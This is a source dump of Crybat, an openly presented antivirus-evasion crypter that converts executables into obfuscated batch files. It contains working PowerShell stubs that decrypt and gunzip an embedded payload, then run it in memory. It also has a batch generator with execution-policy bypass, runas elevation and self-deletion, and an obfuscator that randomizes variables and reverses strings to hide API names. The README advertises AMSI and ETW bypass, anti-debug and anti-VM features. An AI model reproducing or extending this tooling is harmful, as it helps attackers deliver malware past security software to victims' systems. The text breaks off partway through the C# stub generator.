├── version
├── Crybat
├── Resources
│ ├── runpe.dll
│ ├── XORStub.ps1
│ ├── AESStub.ps1
│ └── Stub.cs
├── FodyWeavers.xml
├── App.config
├── Properties
│ ├── Settings.settings
│ ├── Settings.Designer.cs
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
├── Misc
│ ├── Settings.cs
│ └── Utils.cs
├── Program.cs
├── CodeGen
│ ├── FileGen.cs
│ └── StubGen.cs
├── CodeMod
│ ├── Obfuscator.cs
│ └── Patcher.cs
├── packages.config
├── Form1.resx
├── FodyWeavers.xsd
├── Form1.cs
├── Crybat.csproj
└── Form1.Designer.cs
├── LICENSE
├── README.md
└── Crybat.sln
/version:
--------------------------------------------------------------------------------
1 | v1.3.1
2 |
--------------------------------------------------------------------------------
/Crybat/Resources/runpe.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/witchfindertr/Jlaive/HEAD/Crybat/Resources/runpe.dll
--------------------------------------------------------------------------------
/Crybat/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Crybat/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Crybat/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Crybat/Resources/XORStub.ps1:
--------------------------------------------------------------------------------
1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine);
2 | foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var = $line_var.Substring(3); break; }; };
3 | $payload_var = [System.Convert]::FromBase64String($lastline_var);
4 | $key_var = [System.Convert]::FromBase64String('DECRYPTION_KEY');
5 | for ($i = 0; $i -le $payload_var.Length - 1; $i++) { $payload_var[$i] = ($payload_var[$i] -bxor $key_var[$i %% $key_var.Length]); };
6 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var);
7 | $mso_var = New-Object System.IO.MemoryStream;
8 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress);
9 | $gs_var.CopyTo($mso_var);
10 | $gs_var.Dispose();
11 | $msi_var.Dispose();
12 | $mso_var.Dispose();
13 | $payload_var = $mso_var.ToArray();
14 | $obfstep1_var = [System.Reflection.Assembly]::Load($payload_var);
15 | $obfstep2_var = $obfstep1_var.EntryPoint;
16 | $obfstep2_var.Invoke($null, (, [string[]] ('%*')))
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 chash
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Crybat
2 |
3 | Crybat (previously known as Jlaive) is an antivirus evasion tool that can convert executables to undetectable batch files .NET assemblies are not guaranteed to work.
4 |
5 | Join the Discord server for discussion and enquiries: https://discord.gg/Qzyq3Dqn82.
6 |
7 | ## Features
8 | - .NET/Native (x64) support
9 | - AES/XOR encryption
10 | - Compression
11 | - Anti Debug
12 | - Anti VM
13 | - Melt file (self delete)
14 | - Bind files
15 | - AMSI bypass
16 | - ETW bypass
17 |
18 | ## Screenshots
19 |
20 | 
21 | 
22 |
23 |
24 | ## Donate
25 | XMR: 47sQ8jVWGtb8iA5zJnnHmfFmu8GwibMs94JbhtutW9HNeYx9UAxWUNNF3NfE79pGm8bCBCFaF3R6CQEYADoF5Uv38m25SNt
26 |
27 | ## Credits
28 |
29 | C# RunPE: [https://github.com/nettitude/RunPE](https://github.com/nettitude/RunPE)
30 |
31 | ## Disclaimer
32 | This project was made for educational purposes only. I am not responsible if you choose to use this illegally/maliciously.
33 |
--------------------------------------------------------------------------------
/Crybat.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32516.85
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Crybat", "Crybat\Crybat.csproj", "{D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C6803204-4415-411E-8D02-0D633E212A8A}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Crybat/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace Crybat.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.2.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Crybat/Misc/Settings.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using Newtonsoft.Json;
4 |
5 | namespace Crybat
6 | {
7 | public class Settings
8 | {
9 | private static string savepath = AppDomain.CurrentDomain.BaseDirectory + "\\bin\\settings.json";
10 |
11 | public static SettingsObject Load()
12 | {
13 | if (File.Exists(savepath))
14 | {
15 | return JsonConvert.DeserializeObject(File.ReadAllText(savepath));
16 | }
17 | return null;
18 | }
19 |
20 | public static void Save(SettingsObject obj) => File.WriteAllText(savepath, JsonConvert.SerializeObject(obj, Formatting.Indented));
21 | }
22 |
23 | public class SettingsObject
24 | {
25 | public string inputFile { get; set; }
26 | public bool antiDebug { get; set; }
27 | public bool antiVM { get; set; }
28 | public bool selfDelete { get; set; }
29 | public bool hidden { get; set; }
30 | public bool runas { get; set; }
31 | public bool aes { get; set; }
32 | public bool xor { get; set; }
33 | public string[] bindedFiles { get; set; }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/Crybat/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Runtime.InteropServices;
5 | using System.Windows.Forms;
6 |
7 | namespace Crybat
8 | {
9 | internal static class Program
10 | {
11 | [DllImport("user32.dll")]
12 | private static extern bool SetProcessDPIAware();
13 |
14 | [STAThread]
15 | static void Main()
16 | {
17 | string path = Process.GetCurrentProcess().MainModule.FileName;
18 | if (path.IndexOf(Path.GetTempPath(), StringComparison.OrdinalIgnoreCase) == 0)
19 | {
20 | MessageBox.Show("Crybat cannot be run from a ZIP file! Please extract before running.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
21 | Environment.Exit(1);
22 | }
23 | if (!Directory.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin")) Directory.CreateDirectory(AppDomain.CurrentDomain.BaseDirectory + "\\bin");
24 | SetProcessDPIAware();
25 | Application.EnableVisualStyles();
26 | Application.SetCompatibleTextRenderingDefault(false);
27 | Application.Run(new Form1());
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Crybat/Resources/AESStub.ps1:
--------------------------------------------------------------------------------
1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine);
2 | foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var = $line_var.Substring(3); break; }; };
3 | $payload_var = [System.Convert]::FromBase64String($lastline_var);
4 | $aes_var = New-Object System.Security.Cryptography.AesManaged;
5 | $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC;
6 | $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
7 | $aes_var.Key = [System.Convert]::FromBase64String('DECRYPTION_KEY');
8 | $aes_var.IV = [System.Convert]::FromBase64String('DECRYPTION_IV');
9 | $decryptor_var = $aes_var.CreateDecryptor();
10 | $payload_var = $decryptor_var.TransformFinalBlock($payload_var, 0, $payload_var.Length);
11 | $decryptor_var.Dispose();
12 | $aes_var.Dispose();
13 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var);
14 | $mso_var = New-Object System.IO.MemoryStream;
15 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress);
16 | $gs_var.CopyTo($mso_var);
17 | $gs_var.Dispose();
18 | $msi_var.Dispose();
19 | $mso_var.Dispose();
20 | $payload_var = $mso_var.ToArray();
21 | $obfstep1_var = [System.Reflection.Assembly]::Load($payload_var);
22 | $obfstep2_var = $obfstep1_var.EntryPoint;
23 | $obfstep2_var.Invoke($null, (, [string[]] ('%*')))
--------------------------------------------------------------------------------
/Crybat/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Crybat")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Crybat")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d6bba820-e9f7-4da3-a7d2-90a73871c0da")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Crybat/CodeGen/FileGen.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace Crybat
5 | {
6 | public class FileGen
7 | {
8 | public static string CreateBat(byte[] key, byte[] iv, EncryptionMode mode, bool hidden, bool selfdelete, bool runas, Random rng)
9 | {
10 | string command = StubGen.CreatePS(key, iv, mode, rng);
11 | StringBuilder output = new StringBuilder();
12 | output.AppendLine("@echo off");
13 |
14 | if (runas)
15 | {
16 | string runascode =
17 | "if not %errorlevel%==0 ( powershell -noprofile -ep bypass -command Start-Process -FilePath '%0' -ArgumentList '%cd%' -Verb runas & exit /b )"
18 | + Environment.NewLine
19 | + "cd /d %1";
20 | var runasobf = Obfuscator.GenCodeBat(runascode, rng, 3);
21 | output.AppendLine("net file");
22 | output.AppendLine(runasobf.Item1 + Environment.NewLine + runasobf.Item2);
23 | }
24 |
25 | var obfuscated = Obfuscator.GenCodeBat(@"copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /y ", rng, 4);
26 | output.AppendLine(obfuscated.Item1);
27 |
28 | var obfuscated2 = Obfuscator.GenCodeBat("cd %~dp0", rng, 4);
29 | output.AppendLine(obfuscated2.Item1);
30 |
31 | string commandstart = $"-noprofile {(hidden ? "-windowstyle hidden" : string.Empty)} -ep bypass -command ";
32 | var obfuscated3 = Obfuscator.GenCodeBat(commandstart + command, rng, 3);
33 | output.AppendLine(obfuscated3.Item1);
34 |
35 | output.AppendLine(obfuscated.Item2 + "\"%~dp0%~nx0.exe\"");
36 | output.AppendLine("cls");
37 | output.AppendLine(obfuscated2.Item2);
38 | output.AppendLine("\"%~nx0.exe\" " + obfuscated3.Item2);
39 |
40 | if (selfdelete) output.AppendLine("(goto) 2>nul & del \"%~f0\"");
41 | output.Append("exit /b");
42 | return output.ToString();
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/Crybat/CodeMod/Obfuscator.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 |
5 | using static Crybat.Utils;
6 |
7 | namespace Crybat
8 | {
9 | public class Obfuscator
10 | {
11 | public static (string, string) GenCodeBat(string input, Random rng, int level = 5)
12 | {
13 | string ret = string.Empty;
14 | string[] lines = input.Split(new string[] { Environment.NewLine }, StringSplitOptions.None);
15 |
16 | int amount = 5;
17 | if (level > 1) amount -= level;
18 | amount *= 2;
19 |
20 | List setlines = new List();
21 | List linevars = new List();
22 | foreach (string line in lines)
23 | {
24 | List splitted = new List();
25 | string sc = string.Empty;
26 | bool invar = false;
27 | foreach (char c in line)
28 | {
29 | if (c == '%')
30 | {
31 | invar = !invar;
32 | sc += c;
33 | continue;
34 | }
35 | if ((c == ' ' || c == '\'' || c == '.') && invar)
36 | {
37 | invar = false;
38 | sc += c;
39 | continue;
40 | }
41 | if (!invar && sc.Length >= amount)
42 | {
43 | splitted.Add(sc);
44 | invar = false;
45 | sc = string.Empty;
46 | }
47 | sc += c;
48 | }
49 | splitted.Add(sc);
50 |
51 | List vars = new List();
52 | foreach (string s in splitted)
53 | {
54 | string name = RandomString(10, rng);
55 | setlines.Add($"set \"{name}={s}\"");
56 | vars.Add(name);
57 | }
58 | linevars.Add(vars.ToArray());
59 | }
60 |
61 | setlines = new List(setlines.OrderBy(x => rng.Next()));
62 | for (int i = 0; i < setlines.Count; i++)
63 | {
64 | ret += setlines[i];
65 | int r = rng.Next(0, 2);
66 | ret += Environment.NewLine;
67 | }
68 |
69 | string varcalls = string.Empty;
70 | foreach (string[] line in linevars)
71 | {
72 | foreach (string s in line) varcalls += $"%{s}%";
73 | varcalls += Environment.NewLine;
74 | }
75 | return (ret.TrimEnd('\r', '\n'), varcalls.TrimEnd('\r', '\n'));
76 | }
77 | }
78 | }
--------------------------------------------------------------------------------
/Crybat/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace Crybat.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Crybat.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/Crybat/Misc/Utils.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.IO.Compression;
4 | using System.Linq;
5 | using System.Reflection;
6 | using System.Security.Cryptography;
7 |
8 | namespace Crybat
9 | {
10 | public enum EncryptionMode
11 | {
12 | AES,
13 | XOR
14 | }
15 |
16 | public class Utils
17 | {
18 | public static byte[] GetEmbeddedResource(string name)
19 | {
20 | Assembly asm = Assembly.GetExecutingAssembly();
21 | MemoryStream ms = new MemoryStream();
22 | Stream stream = asm.GetManifestResourceStream(name);
23 | stream.CopyTo(ms);
24 | stream.Dispose();
25 | byte[] ret = ms.ToArray();
26 | ms.Dispose();
27 | return ret;
28 | }
29 |
30 | public static string GetEmbeddedString(string name)
31 | {
32 | Assembly asm = Assembly.GetExecutingAssembly();
33 | StreamReader stream = new StreamReader(asm.GetManifestResourceStream(name));
34 | string ret = stream.ReadToEnd();
35 | stream.Close();
36 | stream.Dispose();
37 | return ret;
38 | }
39 |
40 | public static byte[] Encrypt(EncryptionMode type, byte[] input, byte[] key, byte[] iv)
41 | {
42 | switch (type)
43 | {
44 | case EncryptionMode.AES:
45 | {
46 | AesManaged aes = new AesManaged();
47 | aes.Mode = CipherMode.CBC;
48 | aes.Padding = PaddingMode.PKCS7;
49 | ICryptoTransform encryptor = aes.CreateEncryptor(key, iv);
50 | byte[] encrypted = encryptor.TransformFinalBlock(input, 0, input.Length);
51 | encryptor.Dispose();
52 | aes.Dispose();
53 | return encrypted;
54 | }
55 | case EncryptionMode.XOR:
56 | {
57 | for (int i = 0; i < input.Length; i++)
58 | {
59 | input[i] = (byte)(input[i] ^ key[i % key.Length]);
60 | }
61 | return input;
62 | }
63 | }
64 | return null;
65 | }
66 |
67 | public static byte[] Compress(byte[] bytes)
68 | {
69 | MemoryStream msi = new MemoryStream(bytes);
70 | MemoryStream mso = new MemoryStream();
71 | GZipStream gs = new GZipStream(mso, CompressionMode.Compress);
72 | msi.CopyTo(gs);
73 | gs.Dispose();
74 | mso.Dispose();
75 | msi.Dispose();
76 | return mso.ToArray();
77 | }
78 |
79 | public static string RandomString(int length, Random rng)
80 | {
81 | string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
82 | return new string(Enumerable.Repeat(chars, length).Select(s => s[rng.Next(s.Length)]).ToArray());
83 | }
84 |
85 | public static bool IsAssembly(string path)
86 | {
87 | try
88 | {
89 | AssemblyName.GetAssemblyName(path);
90 | return true;
91 | }
92 | catch
93 | {
94 | return false;
95 | }
96 | }
97 | }
98 | }
99 |
--------------------------------------------------------------------------------
/Crybat/CodeMod/Patcher.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Reflection;
6 |
7 | using dnlib.DotNet;
8 | using dnlib.DotNet.Emit;
9 |
10 | namespace Crybat
11 | {
12 | public class Patcher
13 | {
14 | public static byte[] Fix(byte[] input)
15 | {
16 | ModuleDef module = ModuleDefMD.Load(input);
17 | foreach (TypeDef type in module.GetTypes())
18 | {
19 | if (type.IsGlobalModuleType) continue;
20 | foreach (MethodDef method in type.Methods)
21 | {
22 | if (!method.HasBody) continue;
23 | IList instr = method.Body.Instructions;
24 | for (var i = 0; i < instr.Count; i++)
25 | {
26 | if (instr[i].ToString().Contains(".bat.exe"))
27 | {
28 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
29 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
30 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
31 | i += 3;
32 | }
33 | else if (instr[i].ToString().Contains("System.Diagnostics.ProcessModule::get_FileName()"))
34 | {
35 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
36 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
37 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
38 | i += 3;
39 | }
40 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::get_Location()"))
41 | {
42 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
43 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
44 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
45 | i += 3;
46 | }
47 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::GetEntryAssembly()"))
48 | {
49 | instr[i] = OpCodes.Call.ToInstruction(method.Module.Import(GetSystemMethod(typeof(Assembly), "GetExecutingAssembly")));
50 | }
51 | }
52 | method.Body.SimplifyBranches();
53 | }
54 | }
55 | MemoryStream ms = new MemoryStream();
56 | module.Write(ms);
57 | byte[] output = ms.ToArray();
58 | ms.Dispose();
59 | return output;
60 | }
61 |
62 | private static MethodDef GetSystemMethod(Type type, string name, int idx = 0)
63 | {
64 | string filename = type.Module.FullyQualifiedName;
65 | ModuleDefMD module = ModuleDefMD.Load(filename);
66 | TypeDef[] types = module.GetTypes().ToArray();
67 | List methods = new List();
68 | foreach (TypeDef t in types)
69 | {
70 | if (t.Name != type.Name) continue;
71 | foreach (var m in t.Methods)
72 | {
73 |
74 | if (m.Name != name) continue;
75 | methods.Add(m);
76 | }
77 | }
78 | if (methods.Count > 0) return methods[idx];
79 | return null;
80 | }
81 | }
82 | }
83 |
--------------------------------------------------------------------------------
/Crybat/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/Crybat/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/Crybat/Form1.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/Crybat/CodeGen/StubGen.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | using static Crybat.Utils;
6 |
7 | namespace Crybat
8 | {
9 | public class StubGen
10 | {
11 | public static string CreatePS(byte[] key, byte[] iv, EncryptionMode mode, Random rng)
12 | {
13 | string frombase64string_var = RandomString(5, rng);
14 | string readalltext_var = RandomString(5, rng);
15 |
16 | string stubcode = string.Empty;
17 | if (mode == EncryptionMode.AES)
18 | {
19 | stubcode += GetEmbeddedString("Crybat.Resources.AESStub.ps1");
20 | stubcode = stubcode.Replace("FromBase64String", "('gnirtS46esaBmorF'[-1..-16] -join '')");
21 | stubcode = stubcode.Replace("ReadAllText", "('txeTllAdaeR'[-1..-11] -join '')");
22 | stubcode = stubcode.Replace("Load", "('daoL'[-1..-4] -join '')");
23 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key));
24 | stubcode = stubcode.Replace("DECRYPTION_IV", Convert.ToBase64String(iv));
25 | stubcode = stubcode.Replace("contents_var", RandomString(5, rng));
26 | stubcode = stubcode.Replace("lastline_var", RandomString(5, rng));
27 | stubcode = stubcode.Replace("line_var", RandomString(5, rng));
28 | stubcode = stubcode.Replace("payload_var", RandomString(5, rng));
29 | stubcode = stubcode.Replace("aes_var", RandomString(5, rng));
30 | stubcode = stubcode.Replace("decryptor_var", RandomString(5, rng));
31 | stubcode = stubcode.Replace("msi_var", RandomString(5, rng));
32 | stubcode = stubcode.Replace("mso_var", RandomString(5, rng));
33 | stubcode = stubcode.Replace("gs_var", RandomString(5, rng));
34 | stubcode = stubcode.Replace("obfstep1_var", RandomString(5, rng));
35 | stubcode = stubcode.Replace("obfstep2_var", RandomString(5, rng));
36 | }
37 | else
38 | {
39 | stubcode += GetEmbeddedString("Crybat.Resources.XORStub.ps1");
40 | stubcode = stubcode.Replace("FromBase64String", "('gnirtS46esaBmorF'[-1..-16] -join '')");
41 | stubcode = stubcode.Replace("ReadAllText", "('txeTllAdaeR'[-1..-11] -join '')");
42 | stubcode = stubcode.Replace("Load", "('daoL'[-1..-4] -join '')");
43 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key));
44 | stubcode = stubcode.Replace("contents_var", RandomString(5, rng));
45 | stubcode = stubcode.Replace("lastline_var", RandomString(5, rng));
46 | stubcode = stubcode.Replace("line_var", RandomString(5, rng));
47 | stubcode = stubcode.Replace("payload_var", RandomString(5, rng));
48 | stubcode = stubcode.Replace("key_var", RandomString(5, rng));
49 | stubcode = stubcode.Replace("msi_var", RandomString(5, rng));
50 | stubcode = stubcode.Replace("mso_var", RandomString(5, rng));
51 | stubcode = stubcode.Replace("gs_var", RandomString(5, rng));
52 | stubcode = stubcode.Replace("obfstep1_var", RandomString(5, rng));
53 | stubcode = stubcode.Replace("obfstep2_var", RandomString(5, rng));
54 | }
55 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty);
56 | return stubcode;
57 | }
58 |
59 | public static string CreateCS(byte[] key, byte[] iv, EncryptionMode mode, bool antidebug, bool antivm, bool native, Random rng)
60 | {
61 | string namespacename = RandomString(20, rng);
62 | string classname = RandomString(20, rng);
63 | string aesfunction = RandomString(20, rng);
64 | string uncompressfunction = RandomString(20, rng);
65 | string gerfunction = RandomString(20, rng);
66 | string virtualprotect = RandomString(20, rng);
67 | string checkremotedebugger = RandomString(20, rng);
68 | string isdebuggerpresent = RandomString(20, rng);
69 |
